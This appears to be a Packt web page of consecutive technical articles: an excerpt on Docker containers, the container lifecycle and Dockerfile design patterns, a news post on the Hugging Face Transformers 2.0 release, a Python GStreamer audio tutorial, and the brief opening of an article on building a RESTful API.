
Understanding Container Scenarios and Overview of Docker

Packt
24 Jan 2017
17 min read
Docker is one of the most successful recent open source projects; it provides a way to package, ship, and run any application as a lightweight container. Docker containers can be compared to shipping containers: they provide a standard, consistent way of shipping any application. Docker is still a fairly young project, and this article will make it easier to troubleshoot some of the common problems users face while installing and working with Docker containers. In this article by Rajdeep Dua, Vaibhav Kohli, and John Wooten, authors of the book Troubleshooting Docker, the emphasis is on the following topics:

Decoding containers
Diving into Docker
Advantages of Docker containers
Docker lifecycle
Docker design patterns
Unikernels

(For more resources related to this topic, see here.)

Decoding containers

Containerization is an alternative to virtual machines: it encapsulates an application and gives it its own operating environment. The basic foundation for containers is Linux Containers (LXC), a user-space interface for the Linux kernel's containment features. With the help of a powerful API and simple tools, it lets Linux users create and manage application containers. An LXC container sits in between a chroot and a full-fledged virtual machine. Another key difference from traditional hypervisors is that containers share the Linux kernel of the host machine's operating system, so multiple containers running on the same machine use the same kernel. This makes containers fast, with almost zero performance overhead compared to VMs. The major use cases for containers are covered in the following sections.

OS containers

OS containers can be imagined as virtual machines (VMs), but unlike a VM they share the kernel of the host operating system while providing user-space isolation. As with a VM, dedicated resources can be assigned to a container, and we can install, configure, and run different applications and libraries, just as we would on any VM. OS containers are helpful for scalability testing, where a fleet of containers with different flavors of distros can be deployed easily and far more cheaply than a fleet of VMs. Containers are created from templates or images that determine the structure and contents of the container, so it is possible to create containers with an identical environment, the same package versions, and the same configuration across the board, which is mostly used for development environment setups. Various container technologies, such as LXC, OpenVZ, Docker, and BSD jails, are suitable for OS containers.

Figure 1: OS-based container

Application containers

Application containers are designed to run a single service per package, whereas the OS containers explained previously can support multiple processes. Application containers have attracted a lot of attention since the launch of Docker and Rocket. Whenever such a container is launched, it runs a single process, the application process, while an OS container runs multiple services on the same OS. Containers usually take a layered approach, as Docker containers do, which reduces duplication and increases reuse. A container can be started from a base image common to all components, and then layers specific to each component can be added to the filesystem. The layered filesystem also makes it easy to roll back changes, as we can simply switch to the old layers if required.
Each RUN command specified in a Dockerfile adds a new layer to the container image. The main purpose of application containers is to package the different components of an application in separate containers; the components, packaged separately, then interact with each other through APIs and services. This distributed, multi-component deployment is the basic implementation of the microservices architecture. In this approach the developer gets the freedom to package the application as per their requirements, and the IT team gets the ability to deploy the containers on multiple platforms in order to scale the system both horizontally and vertically.

A hypervisor is a virtual machine monitor (VMM) that allows multiple operating systems to run and share the hardware resources of the host. Each virtual machine is termed a guest machine.

The following simple example explains the difference between application containers and OS containers:

Figure 2: Docker layers

Let's consider a three-tier web architecture with a database tier such as MySQL, Nginx as the load balancer, and Node.js as the application tier:

Figure 3: OS container

With an OS container we can pick, say, Ubuntu as the base container and install MySQL, Nginx, and Node.js using a Dockerfile. This type of packaging is good for testing or for a development setup, where all the services are packaged together and can be shipped and shared across developers. But deploying this architecture in production cannot be done with OS containers, as there is no consideration of data scalability and isolation. Application containers meet this use case: we can scale the required component by deploying more application-specific containers, which also helps with load balancing and recovery. For the preceding three-tier architecture, each of the services is packaged into a separate container in order to fulfil the deployment use case.

Figure 4: Application containers scaled up

The main differences between OS and application containers are:

OS container | Application container
Meant to run multiple services on the same OS | Meant to run a single service
Natively, no layered filesystem | Layered filesystem
Examples: LXC, OpenVZ, BSD jails | Examples: Docker, Rocket

Diving into Docker

Docker is a container implementation that has gathered enormous interest in recent years. It neatly bundles various Linux kernel features and services, such as namespaces, cgroups, SELinux, and AppArmor profiles, with union filesystems such as AUFS and BTRFS to build modular images. These images provide a highly configurable virtualized environment for applications and follow the write-once-run-anywhere principle. An application can be as simple as a single process or as complex as a set of highly scalable, distributed processes working together.

Docker is getting a lot of traction in the industry because of its performance and universally replicable architecture, while providing the following four cornerstones of modern application development:

Autonomy
Decentralization
Parallelism
Isolation

Furthermore, the wide-scale adoption of ThoughtWorks's microservices architecture, or Lots of Small Applications (LOSA), is further increasing Docker's potential. As a result, big companies such as Google, VMware, and Microsoft have already ported Docker to their infrastructure, and the momentum is continued by the launch of a myriad of Docker startups, namely Tutum, Flocker, Giant Swarm, and so on.
Since Docker containers replicate their behavior anywhere, be it your development machine, a bare-metal server, a virtual machine, or a datacenter, application designers can focus their attention on development while the operational semantics are left to DevOps. This makes team workflows modular, efficient, and productive. Docker is not to be confused with a VM, even though both are virtualization technologies: Docker shares the host OS while providing a sufficient level of isolation and security to applications running in containers, whereas a VM completely abstracts away the OS and gives stronger isolation and security guarantees. Docker's resource footprint is minuscule in comparison to a VM, and it is therefore preferred for economy and performance. However, it still cannot completely replace VMs and is thus complementary to VM technology:

Figure 5: VM and Docker architecture

Advantages of Docker containers

Listed below are some of the advantages of using Docker containers in a microservices architecture:

Rapid application deployment: Containers can be deployed quickly because of their reduced size; only the application and a minimal runtime are packaged.
Portability: An application together with its operating environment (dependencies) can be bundled into a single Docker container that is independent of the OS version or deployment model. Docker containers can easily be transferred to another machine that runs Docker and executed there without any compatibility issues. Windows support is also planned for future Docker releases.
Easily shareable: Pre-built container images can be shared easily via public repositories, as well as hosted private repositories for internal use.
Lightweight footprint: Docker images are very small and have a minimal footprint for deploying new applications as containers.
Reusability: Successive versions of Docker containers can be built easily and rolled back to previous versions whenever required. Because components from pre-existing layers are reused, the images stay noticeably lightweight.

Docker lifecycle

These are some of the basic steps involved in the lifecycle of a Docker container:

Build the Docker image with the help of a Dockerfile, which contains all the commands required for packaging. It can be run in the following way:

docker build

A tag name can be added as follows:

docker build -t username/my-imagename

If the Dockerfile exists at a different path, the build command can be pointed at it with the -f flag:

docker build -t username/my-imagename -f /path/Dockerfile

After the image has been created, docker run is used to deploy a container. Running containers can be checked with the docker ps command, which lists the currently active containers. Two more commands are worth discussing:

docker pause: This command uses the cgroups freezer to suspend all the processes running in a container; internally it uses the SIGSTOP signal. With it, processes can easily be suspended and resumed whenever required.
docker start: This command is used to start a paused or stopped container.

Once you are done with a container, it can either be stopped or killed. docker stop gracefully stops the running container by sending SIGTERM followed by SIGKILL; in this case the container can still be listed with docker ps -a. docker kill kills the running container by sending SIGKILL directly to the main process running inside it. The same lifecycle can also be driven programmatically, as the sketch below shows.
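This is only a minimal sketch using the Docker SDK for Python (docker-py), which the article itself does not cover; it assumes the SDK is installed (pip install docker), that the Docker daemon is running locally, and that a Dockerfile exists in the current directory. The image tag is a placeholder.

import docker  # Docker SDK for Python (docker-py), assumed to be installed

client = docker.from_env()  # connect to the local Docker daemon

# Build an image from the Dockerfile in the current directory (docker build -t ...)
client.images.build(path=".", tag="username/my-imagename")

# Run a container from the image in the background (docker run -d ...)
container = client.containers.run("username/my-imagename", detach=True)

# List the currently active containers (docker ps)
print(client.containers.list())

# Suspend and resume the container's processes (docker pause / docker unpause)
container.pause()
container.unpause()

# Gracefully stop, then remove, the container (docker stop / docker rm)
container.stop()
container.remove()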
If changes made to a container while it is running need to be preserved, the container can be converted back into an image using docker commit once it has been stopped.

Figure 6: Docker lifecycle

Docker design patterns

Listed below are some Docker design patterns, with examples. A Dockerfile is the base structure from which we define a Docker image; it contains all the commands needed to assemble the image. Using the docker build command, we can create an automated build that executes all of those command-line instructions to create an image:

$ docker build
Sending build context to Docker daemon 6.51 MB
...

The design patterns listed below help in creating Docker images that persist data in volumes and provide other kinds of flexibility, so that they can be re-created or replaced easily at any time.

The base image sharing

For creating a web-based application or blog, we can create a base image that can be shared and that helps to deploy the application with ease. This pattern packages all the required services on top of one base image, so that the web application/blog image can be reused anywhere:

FROM debian:wheezy
RUN apt-get update
RUN apt-get -y install ruby ruby-dev build-essential git
# For debugging
RUN apt-get install -y gdb strace
# Set up my user
RUN useradd vkohli -u 1000 -s /bin/bash --no-create-home
RUN gem install -n /usr/bin bundler
RUN gem install -n /usr/bin rake
WORKDIR /home/vkohli/
ENV HOME /home/vkohli
VOLUME ["/home"]
USER vkohli
EXPOSE 8080

The preceding Dockerfile shows the standard way of creating an application-based image. A Docker image is a zipped file that is a snapshot of all the configuration parameters as well as the changes made on top of the base image (the kernel of the OS). This one installs some specific tools (the Ruby tools rake and bundler) on top of the Debian base image, creates a new user, adds it to the container image, and specifies the working directory by mounting the /home directory from the host, which is explained in detail in the next section.

Shared volume

Sharing a volume at the host level allows other containers to pick up the shared content they require. This helps in rebuilding Docker images faster and in adding, modifying, or removing dependencies. For example, if we are creating the homepage deployment of the previously mentioned blog, the only directory that needs to be shared with the web app container is /home/vkohli/src/repos/homepage, through the Dockerfile, in the following way:

FROM vkohli/devbase
WORKDIR /home/vkohli/src/repos/homepage
ENTRYPOINT bin/homepage web

For creating the dev version of the blog we can share the folder /home/vkohli/src/repos/blog, where all the related developer files can reside. And for creating the dev-version image we can take the base image from the pre-created devbase:

FROM vkohli/devbase
WORKDIR /
USER root
# For Graphviz integration
RUN apt-get update
RUN apt-get -y install graphviz xsltproc imagemagick
USER vkohli
WORKDIR /home/vkohli/src/repos/blog
ENTRYPOINT bundle exec rackup -p 8080

Dev-tools container

For development purposes we have separate dependencies in the dev and production environments, which easily get co-mingled at some point. Containers can be helpful in separating the dependencies by packaging them separately.
As shown in the following example, we can derive a dev-tools container image from the base image and install development dependencies on top of it, even allowing an SSH connection so that we can work on the code:

FROM vkohli/devbase
RUN apt-get update
RUN apt-get -y install openssh-server emacs23-nox htop screen
# For debugging
RUN apt-get -y install sudo wget curl telnet tcpdump
# For 32-bit experiments
RUN apt-get -y install gcc-multilib
# Man pages and "most" viewer:
RUN apt-get install -y man most
RUN mkdir /var/run/sshd
ENTRYPOINT /usr/sbin/sshd -D
VOLUME ["/home"]
EXPOSE 22
EXPOSE 8080

As can be seen, basic tools required during development, such as wget, curl, and tcpdump, are installed. The SSHD service is installed too, which allows an SSH connection into the dev container.

Test environment container

Testing the code in different environments always eases the process and helps find more bugs in isolation. We can create a Ruby environment in a separate container to spawn a new Ruby shell and use it to test the code base:

FROM vkohli/devbase
RUN apt-get update
RUN apt-get -y install ruby1.8 git ruby1.8-dev

In the preceding Dockerfile we use devbase as the base image, and with just one docker run command we can easily create a new environment, using the image created from this Dockerfile, to test the code.

The build container

Some build steps of an application are expensive. To overcome this we can create a separate build container which carries the dependencies needed during the build process. The following Dockerfile can be used to run a separate build process:

FROM sampleapp
RUN apt-get update
RUN apt-get install -y build-essential [assorted dev packages for libraries]
VOLUME ["/build"]
WORKDIR /build
CMD ["bundler", "install", "--path", "vendor", "--standalone"]

/build is the shared directory that can be used to provide the compiled binaries; we can also mount the /build/source directory in the container to provide updated dependencies. Thus, by using a build container, we can decouple the build process and the final packaging into separate containers. The process and its dependencies are still encapsulated, just broken across separate containers.

The installation container

The purpose of this container is to package the installation steps in a separate container, basically to support deployment of containers to a production environment. A sample Dockerfile that packages the installation script inside a Docker image looks as follows:

ADD installer /installer
CMD /installer.sh

The installer.sh can contain the specific installation commands to deploy containers in the production environment and also to provide the proxy setup with DNS entries, in order to have a cohesive environment deployed.

Service-in-a-box container

In order to deploy a complete application in a container, we can bundle multiple services to provide a complete deployment container. In this case we bundle the web app, an API service, and the database together in one container.
This eases the pain of interlinking various separate containers:

services:
  web:
    git_url: [email protected]:vkohli/sampleapp.git
    git_branch: test
    command: rackup -p 3000
    build_command: rake db:migrate
    deploy_command: rake db:migrate
    log_folder: /usr/src/app/log
    ports: ["3000:80:443", "4000"]
    volumes: ["/tmp:/tmp/mnt_folder"]
    health: default
  api:
    image: quay.io/john/node
    command: node test.js
    ports: ["1337:8080"]
    requires: ["web"]
databases:
  - "mysql"
  - "redis"

Infrastructure container

While we have talked about container usage in the development environment, there is one big category missing: the use of containers for infrastructure services, such as a proxy setup that provides a cohesive environment for accessing the application. In the following Dockerfile example, haproxy is installed and a link to its configuration file is provided:

FROM debian:wheezy
ADD wheezy-backports.list /etc/apt/sources.list.d/
RUN apt-get update
RUN apt-get -y install haproxy
ADD haproxy.cfg /etc/haproxy/haproxy.cfg
CMD ["haproxy", "-db", "-f", "/etc/haproxy/haproxy.cfg"]
EXPOSE 80
EXPOSE 443

haproxy.cfg is the configuration file responsible for authenticating a user:

backend test
  acl authok http_auth(adminusers)
  http-request auth realm vkohli if !authok
  server s1 192.168.0.44:8084

Unikernels

Unikernels compile source code into a custom operating system that includes only the functionality required by the application logic, producing a specialized, single-address-space machine image and eliminating unnecessary code. Unikernels are built using a library operating system, which has the following benefits compared to a traditional OS:

Fast boot time: Unikernels make provisioning highly dynamic and can boot in less than a second.
Small footprint: A unikernel code base is smaller than its traditional OS equivalent and much easier to manage.
Improved security: As unnecessary code is not deployed, the attack surface is drastically reduced.
Fine-grained optimization: Unikernels are constructed with compile toolchains and are optimized for the device drivers and application logic that will actually be used.

Unikernels match the microservices architecture very well, as both the source code and the generated binaries can easily be version-controlled and are compact enough to be rebuilt. On the other hand, VMs cannot be modified directly; changes can only be made to the source code, which is time-consuming and hectic. For example, if an application doesn't require disk access or a display, a unikernel can drop the unnecessary device drivers and display functionality from the kernel. The production system thus becomes minimalistic, packaging only the application code, the runtime environment, and the OS facilities, which is the basic concept of immutable application deployment: a new image is constructed whenever an application change is required on the production servers.

Figure 7: Transition from traditional containers to unikernel-based containers

Containers and unikernels are a good fit for each other. Recently, the Unikernel Systems team became part of Docker, and the collaboration of these two technologies will be seen in an upcoming Docker release. As explained in the preceding diagram, the first stage shows the traditional way of packaging: one VM supporting multiple Docker containers. The next stage shows a 1:1 mapping (one container per VM), which allows each application to be self-contained and gives better resource usage, but creating a separate VM for each container adds overhead.
In the last stage we can see unikernels working with the existing Docker tools and ecosystem, where each container gets the kernel and low-level library environment specific to its needs. Adoption of unikernels in the Docker toolchain will accelerate their progress; they will be widely used and understood as a packaging model and runtime framework, making unikernels another type of container. Once the unikernel abstraction is in place for Docker developers, we will be able to choose between a traditional Docker container and a unikernel container when creating the production environment.

Summary

In this article we covered the basic containerization concepts with the help of application and OS-based containers. The differences between them explained here will help developers choose the containerization approach that best fits their system. We also threw some light on the Docker technology, its advantages, and the lifecycle of a Docker container. The eight Docker design patterns explained in this article show how to implement Docker containers in a production environment.

Resources for Article:

Further resources on this subject:
Orchestration with Docker Swarm [article]
Benefits and Components of Docker [article]
Docker Hosts [article]

Transformers 2.0: NLP library with deep interoperability between TensorFlow 2.0 and PyTorch, and 32+ pretrained models in 100+ languages

Fatema Patrawala
30 Sep 2019
3 min read
Last week, Hugging Face, a startup specializing in natural language processing, released a landmark update to their popular Transformers library, offering unprecedented compatibility between two major deep learning frameworks, PyTorch and TensorFlow 2.0. Transformers (formerly known as pytorch-transformers and pytorch-pretrained-bert) provides general-purpose architectures (BERT, GPT-2, RoBERTa, XLM, DistilBert, XLNet, and more) for Natural Language Understanding (NLU) and Natural Language Generation (NLG), with over 32 pretrained models in 100+ languages and deep interoperability between TensorFlow 2.0 and PyTorch.

Transformers 2.0 embraces the 'best of both worlds', combining PyTorch's ease of use with TensorFlow's production-grade ecosystem. The new library makes it easier for scientists and practitioners to select different frameworks for the training, evaluation, and production phases of developing the same language model.

"This is a lot deeper than what people usually think when they talk about compatibility," said Thomas Wolf, who leads Hugging Face's data science team. "It's not only about being able to use the library separately in PyTorch and TensorFlow. We're talking about being able to seamlessly move from one framework to the other dynamically during the life of the model."

https://twitter.com/Thom_Wolf/status/1177193003678601216

"It's the number one feature that companies asked for since the launch of the library last year," said Clement Delangue, CEO of Hugging Face.

Notable features in Transformers 2.0

8 architectures with over 30 pretrained models, in more than 100 languages
Load a model and pre-process a dataset in less than 10 lines of code
Train a state-of-the-art language model in a single line with the tf.keras fit function
Share pretrained models, reducing compute costs and carbon footprint
Deep interoperability between TensorFlow 2.0 and PyTorch models
Move a single model between TF2.0/PyTorch frameworks at will
Seamlessly pick the right framework for training, evaluation, and production
As powerful and concise as Keras

(A brief code sketch illustrating this workflow appears at the end of this post.)

About Hugging Face Transformers

With half a million installs since January 2019, Transformers is the most popular open-source NLP library. More than 1,000 companies, including Bing, Apple, and Stitch Fix, are using it in production for text classification, question answering, intent detection, text generation, and conversational applications. Hugging Face, the creators of Transformers, have raised US$5M so far from investors at companies like Betaworks, Salesforce, Amazon, and Apple. On Hacker News, users are praising the company and noting how Transformers has become the most important library in NLP.

Other interesting news in data

Baidu open sources ERNIE 2.0, a continual pre-training NLP model that outperforms BERT and XLNet on 16 NLP tasks
Dr Joshua Eckroth on performing Sentiment Analysis on social media platforms using CoreNLP
Facebook open-sources PyText, a PyTorch based NLP modeling framework
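Returning to the release itself: the following is a minimal sketch, not taken from the announcement, of the kind of workflow the feature list above describes. It assumes transformers 2.x and TensorFlow 2.0 are installed and uses bert-base-uncased as an example checkpoint; exact class names and return types may differ slightly across versions.

import tensorflow as tf
from transformers import BertTokenizer, TFBertForSequenceClassification

# Load a pretrained tokenizer and its TensorFlow 2.0 model from the same checkpoint
tokenizer = BertTokenizer.from_pretrained("bert-base-uncased")
model = TFBertForSequenceClassification.from_pretrained("bert-base-uncased")

# Tokenize a sentence and run a forward pass; outputs are returned as a tuple of tensors
inputs = tokenizer.encode("Transformers 2.0 speaks both TensorFlow and PyTorch",
                          return_tensors="tf")
logits = model(inputs)[0]

# Because the model is a tf.keras.Model, it can be compiled and then trained with fit()
model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5),
              loss=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True))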

Python Multimedia: Working with Audios

Packt
30 Aug 2010
14 min read
(For more resources on Python, see here.)

So let's get on with it!

Installation prerequisites

Since we are going to use an external multimedia framework, it is necessary to install the packages mentioned in this section.

GStreamer

GStreamer is a popular open source multimedia framework that supports audio/video manipulation of a wide range of multimedia formats. It is written in the C programming language and provides bindings for other programming languages, including Python. Several open source projects use the GStreamer framework to develop their own multimedia applications. Throughout this article, we will make use of the GStreamer framework for audio handling. In order to get this working with Python, we need to install both GStreamer and the Python bindings for GStreamer.

Windows platform

The binary distribution of GStreamer is not provided on the project website http://www.gstreamer.net/. Installing it from source may require considerable effort on the part of Windows users. Fortunately, the GStreamer WinBuilds project provides pre-compiled binary distributions. Here is the URL of the project website: http://www.gstreamer-winbuild.ylatuya.es

The binary distributions of GStreamer, as well as its Python bindings (for Python 2.6), are available in the Download area of the website: http://www.gstreamer-winbuild.ylatuya.es/doku.php?id=download

You need to install two packages: first GStreamer, and then the Python bindings to GStreamer. Download and install the GPL distribution of GStreamer available on the GStreamer WinBuilds project website. The name of the GStreamer executable is GStreamerWinBuild-0.10.5.1.exe; the version should be 0.10.5 or higher. By default, this installation will create a folder C:\gstreamer on your machine. The bin directory within this folder contains the runtime libraries needed while using GStreamer.

Next, install the Python bindings for GStreamer. The binary distribution is available on the same website. Use the executable Pygst-0.10.15.1-Python2.6.exe pertaining to Python 2.6; the version should be 0.10.15 or higher.

GStreamer WinBuilds appears to be an independent project. It is based on the OSSBuild development suite; visit http://code.google.com/p/ossbuild/ for more information. It could happen that the GStreamer binary built with Python 2.6 is no longer available on the mentioned website at the time you are reading this book. Therefore, it is advised that you contact the developer community of OSSBuild; perhaps they can help you out!

Alternatively, you can build GStreamer from source on the Windows platform using a Linux-like environment for Windows, such as Cygwin (http://www.cygwin.com/). Under this environment, you can first install dependent software packages such as Python 2.6, the gcc compiler, and others. Download the gst-python-0.10.17.2.tar.gz package from the GStreamer website http://www.gstreamer.net/, then extract it and install it from source using the Cygwin environment. The INSTALL file within the package has installation instructions.

Other platforms

Many Linux distributions provide a GStreamer package. You can search for the appropriate gst-python distribution (for Python 2.6) in the package repository. If such a package is not available, install gst-python from source as discussed in the earlier Windows platform section. If you are a Mac OS X user, visit http://py26-gst-python.darwinports.com/.
It has detailed instructions on how to download and install the package Py26-gst-python version 0.10.17 (or higher).

Mac OS X 10.5.x (Leopard) comes with the Python 2.5 distribution. If you are using this default version of Python, GStreamer Python bindings built against Python 2.5 are available on the darwinports website: http://gst-python.darwinports.com/

PyGObject

There is a free, multiplatform software utility library called GLib. It provides data structures such as hash maps, linked lists, and so on, and it also supports the creation of threads. The 'object system' of GLib is called GObject. Here, we need to install the Python bindings for GObject, which are available on the PyGTK website at: http://www.pygtk.org/downloads.html

Windows platform

The binary installer is available on the PyGTK website. The complete URL is: http://ftp.acc.umu.se/pub/GNOME/binaries/win32/pygobject/2.20/. Download and install version 2.20 for Python 2.6.

Other platforms

For Linux, the source tarball is available on the PyGTK website. There may even be a binary distribution in the package repository of your Linux operating system. The direct link to version 2.21 of PyGObject (source tarball) is: http://ftp.gnome.org/pub/GNOME/sources/pygobject/2.21/

If you are a Mac user and you have Python 2.6 installed, a distribution of PyGObject is available at http://py26-gobject.darwinports.com/. Install version 2.14 or later.

Summary of installation prerequisites

The following list summarizes the packages needed for this article.

GStreamer
  Download location: http://www.gstreamer.net/
  Version: 0.10.5 or later
  Windows platform: Install using the binary distribution available on the GStreamer WinBuild website: http://www.gstreamer-winbuild.ylatuya.es/doku.php?id=download. Use GStreamerWinBuild-0.10.5.1.exe (or a later version if available).
  Linux/Unix/OS X platforms: Linux: use the GStreamer distribution in the package repository. Mac OS X: download and install by following the instructions on the website http://gstreamer.darwinports.com/.

Python bindings for GStreamer
  Download location: http://www.gstreamer.net/
  Version: 0.10.15 or later for Python 2.6
  Windows platform: Use the binary provided by the GStreamer WinBuild project. See http://www.gstreamer-winbuild.ylatuya.es for details pertaining to Python 2.6.
  Linux/Unix/OS X platforms: Linux: use the gst-python distribution in the package repository. Mac OS X: use http://py26-gst-python.darwinports.com/ (if you are using Python 2.6). Linux/Mac: alternatively, build and install from the source tarball.

Python bindings for GObject (PyGObject)
  Download location: source distribution at http://www.pygtk.org/downloads.html
  Version: 2.14 or later for Python 2.6
  Windows platform: Use the binary package pygobject-2.20.0.win32-py2.6.exe.
  Linux/Unix/OS X platforms: Linux: install from source if pygobject is not available in the package repository. Mac: use the package on darwinports (if you are using Python 2.6); see http://py26-gobject.darwinports.com/ for details.

Testing the installation

Ensure that GStreamer and its Python bindings are properly installed. It is simple to test this. Just start Python from the command line and type the following:

>>> import pygst

If there is no error, it means the Python bindings are installed properly. Next, type the following:

>>> pygst.require("0.10")
>>> import gst

If this import is successful, we are all set to use GStreamer for processing audio and video! If import gst fails, it will probably complain that it is unable to load some required DLL/shared object.
In this case, check your environment variables and make sure that the PATH variable has the correct path to the gstreamer/bin directory. The following lines in a Python interpreter show the typical location of the pygst and gst modules on the Windows platform:

>>> import pygst
>>> pygst
<module 'pygst' from 'C:\Python26\lib\site-packages\pygst.pyc'>
>>> pygst.require('0.10')
>>> import gst
>>> gst
<module 'gst' from 'C:\Python26\lib\site-packages\gst-0.10\gst\__init__.pyc'>

Next, test whether PyGObject is successfully installed. Start the Python interpreter and try importing the gobject module:

>>> import gobject

If this works, we are all set to proceed!

A primer on GStreamer

In this article, we will be using the GStreamer multimedia framework extensively. Before we move on to the topics that teach us various audio processing techniques, a primer on GStreamer is necessary. So what is GStreamer? It is a framework on top of which one can develop multimedia applications. The rich set of libraries it provides makes it easier to develop applications with complex audio/video processing capabilities. The fundamental components of GStreamer are briefly explained in the coming subsections. Comprehensive documentation is available on the GStreamer project website; the GStreamer Application Development Manual is a very good starting point. In this section, we will briefly cover some of the important aspects of GStreamer. For further reading, you are recommended to visit the GStreamer project website: http://www.gstreamer.net/documentation/

gst-inspect and gst-launch

We will start by learning two important GStreamer commands. GStreamer can be run from the command line by calling gst-launch-0.10.exe (on Windows) or gst-launch-0.10 (on other platforms). The following command shows a typical execution of GStreamer on Linux; we will see what a pipeline means in the next subsection:

$ gst-launch-0.10 pipeline_description

GStreamer has a plugin architecture and supports a huge number of plugins. To see more details about any plugin in your GStreamer installation, use the command gst-inspect-0.10 (gst-inspect-0.10.exe on Windows). We will use this command quite often. Its use is illustrated here:

$ gst-inspect-0.10 decodebin

Here, decodebin is a plugin. Upon execution, the preceding command prints detailed information about the decodebin plugin.

Elements and pipeline

In GStreamer, data flows in a pipeline. Various elements are connected together to form a pipeline, such that the output of one element is the input to the next. A pipeline can be logically represented as follows:

Element1 ! Element2 ! Element3 ! Element4 ! Element5

Here, Element1 through Element5 are element objects chained together by the ! symbol. Each element performs a specific task. One element object reads the input data, such as an audio or video file. Another element decodes the file read by the first element, whereas yet another element converts the data into some other format and saves the output. As stated earlier, linking these element objects in the proper order creates a pipeline.

The concept of a pipeline is similar to the one used in Unix. The following is a Unix example of a pipeline, where the vertical separator | defines the pipe:

$ ls -la | more

Here, ls -la lists all the files in a directory. However, sometimes this list is too long to be displayed in the shell window, so adding | more allows the user to page through the data.
Now let's see a realistic example of running GStreamer from the command prompt:

$ gst-launch-0.10 -v filesrc location=path/to/file.ogg ! decodebin ! audioconvert ! fakesink

For a Windows user, the command name would be gst-launch-0.10.exe. The pipeline is constructed by specifying the different elements; the ! symbol links adjacent elements, thereby forming the whole pipeline for the data to flow through. For the Python bindings of GStreamer, the abstract base class for pipeline elements is gst.Element, whereas the gst.Pipeline class can be used to create a pipeline instance. In a pipeline, the data is sent to a separate thread, where it is processed until it reaches the end or a termination signal is sent.

Plugins

GStreamer is a plugin-based framework, and several plugins are available. A plugin is used to encapsulate the functionality of one or more GStreamer elements. Thus we can have a plugin in which multiple elements work together to create the desired output; the plugin itself can then be used as an abstract element in a GStreamer pipeline. An example is decodebin, which we will learn about in the upcoming sections. A comprehensive list of available plugins is available at the GStreamer website http://gstreamer.freedesktop.org. In almost all the applications to be developed, the decodebin plugin will be used. For audio processing, the functionality provided by plugins such as gnonlin, audioecho, monoscope, interleave, and so on will be used.

Bins

In GStreamer, a bin is a container that manages the element objects added to it. A bin instance can be created using the gst.Bin class. It inherits from gst.Element and can act as an abstract element representing a bunch of elements within it. The GStreamer plugin decodebin is a good example of a bin: decodebin contains decoder elements and auto-plugs the decoders to create the decoding pipeline.

Pads

Each element has connection points for handling data input and output; GStreamer refers to them as pads. An element object can have one or more 'receiver pads', termed sink pads, that accept data from the previous element in the pipeline. Similarly, there are 'source pads' that take the data out of the element as input to the next element (if any) in the pipeline. The following is a very simple example that shows how source and sink pads are specified:

> gst-launch-0.10.exe fakesrc num-buffers=1 ! fakesink

The fakesrc is the first element in the pipeline; therefore, it only has a source pad. It transmits the data to the next linked element, that is, fakesink, which only has a sink pad to accept the data. Note that in this case, since these are fakesrc and fakesink, only empty buffers are exchanged. A pad is defined by the class gst.Pad, and a pad can be attached to an element object using the gst.Element.add_pad() method. The following is a diagrammatic representation of a GStreamer element with a pad. It illustrates two GStreamer elements within a pipeline, each having a single source and sink pad.

Now that we know how pads operate, let's discuss some special types of pads. In the example, we assumed that the pads of an element are always 'out there'. However, there are situations where an element doesn't have its pads available all the time; such elements request the pads they need at runtime. Such a pad is called a dynamic pad. Another type of pad is called a ghost pad. Both types are discussed in this section.

Dynamic pads

Some elements, such as decodebin, do not have pads defined when they are created.
Such elements determine the type of pad to be used at runtime. For example, depending on the media file being processed, decodebin will create a pad. This is often referred to as a dynamic pad, or sometimes an available pad, as it is not always available in elements such as decodebin.

Ghost pads

As stated in the Bins section, a bin object can act as an abstract element. How is that achieved? For that, the bin uses 'ghost pads', or 'pseudo link pads'. The ghost pads of a bin are used to connect to an appropriate element inside it. A ghost pad can be created using the gst.GhostPad class.

Caps

Element objects send and receive data through their pads. The type of media data that an element object can handle is determined by its caps (short for capabilities). Caps is a structure that describes the media formats supported by the element; caps are defined by the class gst.Caps.

Bus

A bus refers to the object that delivers the messages generated by GStreamer. A message is a gst.Message object that informs the application about an event within the pipeline. A message is put on the bus using the gst.Bus.gst_bus_post() method. The following code shows an example usage of the bus:

1 bus = pipeline.get_bus()
2 bus.add_signal_watch()
3 bus.connect("message", message_handler)

The first line in the code creates a gst.Bus instance; here, pipeline is an instance of gst.Pipeline. On the next line, we add a signal watch so that the bus gives out all the messages posted on it. Line 3 connects the signal to a Python method; in this example, "message" is the signal string and the method it calls is message_handler.

Playbin/Playbin2

Playbin is a GStreamer plugin that provides a high-level audio/video player. It can handle a number of things, such as automatic detection of the input media file format, auto-determination of decoders, audio visualization, volume control, and so on. The following line of code creates a playbin element:

playbin = gst.element_factory_make("playbin")

It defines a property called uri. The URI (Uniform Resource Identifier) should be an absolute path to a file on your computer or on the Web. According to the GStreamer documentation, Playbin2 is simply the latest, still unstable, version; once stable, it will replace Playbin. A Playbin2 instance can be created in the same way as a Playbin instance, and its details can be inspected with:

gst-inspect-0.10 playbin2

With this basic understanding, let us learn about various audio processing techniques using GStreamer and Python.
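Before moving on, the following is a minimal sketch, not part of the original article, that ties the playbin and bus concepts together into a tiny command-line audio player. It assumes the gst-python 0.10 bindings installed above; the file path is a placeholder and error handling is kept to the bare minimum.

import pygst
pygst.require("0.10")
import gst
import gobject

gobject.threads_init()

def message_handler(bus, message):
    # Stop the main loop when the stream finishes or an error is posted on the bus
    if message.type in (gst.MESSAGE_EOS, gst.MESSAGE_ERROR):
        player.set_state(gst.STATE_NULL)
        loop.quit()

# playbin auto-detects the input format and builds the decoding pipeline for us
player = gst.element_factory_make("playbin")
player.set_property("uri", "file:///path/to/file.ogg")  # placeholder path

bus = player.get_bus()
bus.add_signal_watch()
bus.connect("message", message_handler)

player.set_state(gst.STATE_PLAYING)

loop = gobject.MainLoop()
loop.run()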

Creating a RESTful API

Packt
19 Sep 2014
24 min read
In this article by Jason Krol, the author of Web Development with MongoDB and NodeJS, we will review the following topics:

(For more resources related to this topic, see here.)

Introducing RESTful APIs
Installing a few basic tools
Creating a basic API server and sample JSON data
Responding to GET requests
Updating data with POST and PUT
Removing data with DELETE
Consuming external APIs from Node

What is an API?

